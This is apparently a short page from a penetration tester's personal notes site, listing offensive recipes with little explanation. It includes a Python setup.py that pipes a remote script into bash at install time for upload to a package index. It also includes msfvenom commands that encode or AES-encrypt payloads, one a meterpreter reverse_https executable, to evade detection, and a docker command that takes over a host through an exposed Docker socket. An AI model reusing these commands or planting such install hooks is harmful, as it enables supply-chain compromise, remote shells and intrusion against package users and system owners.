xct's notes
Search…
Misc

PyPi Package Upload

Minimal Python Package:
1
from distutils.core import setup
2
import os
3
4
if not "xct" in open("/etc/passwd").read():
5
os.system("curl <ip>/x.sh|/bin/bash")
6
setup(name='xct',
7
version='1.0',
8
py_modules=[],
9
)
Copied!
Then you can do python setup.py sdist upload -r local do upload it to a remote server pypi server. This needs a configuration file in home:
1
[distutils]
2
index-servers =
3
local
4
5
[local]
6
repository: http://<>
7
username: <>
8
password: <>
Copied!

Encode existing payload with msfvenom

1
msfvenom -f raw -i 33 -a x86_64 --platform windows -e x86/shikata_ga_nai -p generic/custom PAYLOADFILE=<file> -o <enc_file>
Copied!
Note that shikata-ga-nai does not work for x64 payloads, in this case we can use x64/zutto_dekiru.

Create encrypted payload with msfvenom

1
msfvenom -p windows/x64/meterpreter/reverse_https LHOST= LPORT=443 --encrypt aes256 --encrypt-key mykey -f exe -o aes.exe
Copied!

Exposed Docker Socket RCE

1
docker -H <ip>:2375 run --rm -it --privileged --net=host -v /:/mnt alpine
Copied!
For file access cat /mnt/etc/passwd, for RCE chroot /mnt.
Last modified 11mo ago